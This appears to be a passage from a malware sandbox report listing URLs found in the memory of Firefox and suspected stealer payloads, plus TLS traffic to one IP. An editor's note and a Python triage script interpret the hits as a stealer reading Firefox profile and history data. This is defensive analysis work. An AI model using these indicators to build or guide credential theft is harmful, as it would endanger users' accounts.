Source: 79ddad050f.exe, 00000008.00000003.3071958738.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3641525579.000001C23DEF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150637847.000001C23BE3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150450150.000001C23BE1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150800700.000001C23BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150956567.000001C23BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150183043.000001C23C300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001B.00000002.3649402880.000001C23EB29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DDA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: 79ddad050f.exe, 00000008.00000003.3071958738.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093905264.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3180385718.000001C2447D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3178681341.000001C244797000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/searchcb8e7210-9f0b-48fa-8708-b9a03df79eeaa620b506-c3ae-4332-97bb-19
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/onPrefEnabledChanged()
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3641525579.000001C23DEF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150637847.000001C23BE3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E02D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150450150.000001C23BE1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150800700.000001C23BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150956567.000001C23BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150183043.000001C23C300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206512868.000001C23E161000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206512868.000001C23E161000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191842126.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DDA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 0000001B.00000002.3351019948.000001C238410000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3264796864.0000001AF627B000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346986289.000001C237CA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3181465524.000001C244A29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3193714201.000001C244A82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/Microsurvey
Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/about/legal/terms/subscription-services/
Source: 79ddad050f.exe, 00000008.00000003.3033865099.0000000005A07000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3636872771.000001C23D9D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/subscription-services/
Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource:///modules/UrlbarResult.sys.mjsresource://gre/modules/A
Source: 79ddad050f.exe, 00000008.00000003.3033865099.0000000005A07000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3636872771.000001C23D9D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: firefox.exe, 0000001B.00000002.3346346381.000001C237B52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: 79ddad050f.exe, 00000008.00000003.3033865099.0000000005A07000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346986289.000001C237CA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/get
Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191842126.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D804000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/toolkit/about/aboutPlugins.ftlset
Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001B.00000002.3646061223.000001C23E603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C238410000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23EDC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191961267.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3649402880.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3190903073.000001C23EDDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3438395331.000001C23B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191961267.000001C23EBEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001B.00000002.3628973173.000001C23CF21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3190903073.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191961267.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3646061223.000001C23E6C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3284540763.000001C22C039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C311000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3626934066.000001C23CEBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DA29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3649402880.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3626934066.000001C23CEB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3285616867.000001C22C1B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.3131490977.000001D01635A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3137720928.000001B4B4117000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3284540763.000001C22C039000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdArgument
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdhttp://mozilla.org/#
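Almost every URL hit above is Firefox's own built-in string table (support.mozilla.org, spocs.getpocket.com, search engine templates), so the signal in this block is not the URLs themselves but which process held them. Hits attributed to 79ddad050f.exe, e051bdf457.exe and the dropped file DHDHJJJE.9.dr are browser URLs sitting in the memory of the payloads, which is what a stealer reading Firefox profile data looks like. The strings "https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc" and "https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6" are URL, reversed hostname with trailing dot, and a 12-character id run together, which is the column layout (url, rev_host, guid) of the moz_places table in Firefox's places.sqlite; reading that as a places.sqlite row in 79ddad050f.exe memory is this editor's interpretation, not a finding stated by the sandbox. The following triage script is an added example, not part of the report or of any sandbox tooling. It parses the "Source: ... String found in binary or memory: ..." line format used here, attributes each dump token to the process image that precedes it, splits hits into browser-only and non-browser, and flags URL+rev_host+guid triplets. The input is a handful of lines copied from the report above and shortened to fewer dumps; BROWSER_IMAGES and the dropped-file token pattern (name.procnum.dr) are assumptions from this page's own tokens.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: five lines excerpted from the report above, with the long
# lists of memory dumps shortened. Not a complete copy of the section.
REPORT_LINES = [
    "Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp "
    "String found in binary or memory: https://support.mozilla.org/kb/website-translation",
    "Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp "
    "String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc",
    "Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp "
    "String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6",
    "Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, "
    "e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, "
    "DHDHJJJE.9.dr String found in binary or memory: https://www.ecosia.org/newtab/",
    "Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, "
    "firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp "
    "String found in binary or memory: https://www.amazon.com/",
]

# Memory dump token: <procnum>.<n>.<n>.<address>.<prot>.<type>.<state>.<n>.sdmp (format as seen on this page).
DUMP_RE = re.compile(r"^([0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.[0-9A-F]{16}(?:\.[0-9A-F]{8}){4}\.sdmp$")
# Dropped-file token: <name>.<procnum>.dr (assumed from tokens such as DHDHJJJE.9.dr, prefs-1.js.27.dr).
DROP_RE = re.compile(r"^(.+)\.(\d+)\.dr$")
MARKER = " String found in binary or memory: "
# Assumption: the only legitimate browser image in this run is firefox.exe.
BROWSER_IMAGES = {"firefox.exe"}


def parse_hit(line):
    """Return (url, [(image_or_filename, procnum, kind), ...]) for one report line, or None."""
    if not line.startswith("Source: ") or MARKER not in line:
        return None
    src, url = line[len("Source: "):].split(MARKER, 1)
    origins, current_image = [], None
    for tok in src.split(", "):
        m = DUMP_RE.match(tok)
        if m:                       # a dump belongs to the image name that preceded it
            origins.append((current_image, int(m.group(1), 16), "memory"))
            continue
        m = DROP_RE.match(tok)
        if m:                       # dropped file written by process <procnum>
            origins.append((m.group(1), int(m.group(2)), "dropped-file"))
            continue
        current_image = tok         # anything else is a process image name
    return url.strip(), origins


def places_row_hit(s):
    """If s is <url><reversed host>.<12-char guid>, return (url, guid); this is the moz_places layout."""
    parts = urlsplit(s)
    host = parts.hostname
    if not host:
        return None
    rev_host = host[::-1] + "."
    idx = s.find(rev_host, len(parts.scheme) + 3 + len(host))
    if idx < 0:
        return None
    m = re.fullmatch(r"[A-Za-z0-9_-]{12}", s[idx + len(rev_host):])
    return (s[:idx], m.group(0)) if m else None


def triage(lines):
    """Group URL hits by origin and separate browser noise from payload-side hits."""
    by_url = defaultdict(set)
    for line in lines:
        parsed = parse_hit(line)
        if parsed is None:
            continue
        url, origins = parsed
        by_url[url].update(origins)
    report = {"browser_only": [], "non_browser": [], "places_rows": []}
    for url, origins in sorted(by_url.items()):
        images = {img for img, _, _ in origins}
        if images and images <= BROWSER_IMAGES:
            report["browser_only"].append(url)
        else:
            report["non_browser"].append((url, sorted(origins, key=repr)))
        row = places_row_hit(url)
        if row:
            report["places_rows"].append(row + (sorted(images),))
    return report


if __name__ == "__main__":
    result = triage(REPORT_LINES)
    print(f"{len(result['browser_only'])} browser-only URL(s) (noise)")
    for url, origins in result["non_browser"]:
        print("payload-side hit:", url, origins)
    for url, guid, images in result["places_rows"]:
        print("moz_places-shaped string:", url, guid, images)
```

Run against the full section, the non_browser bucket is the list worth a second look: browser-specific URLs inside the payload processes point at which profile files were read, and the guid-bearing rows tie a specific history entry to a specific process dump.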
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49906 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49934 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49948 version: TLS 1.2
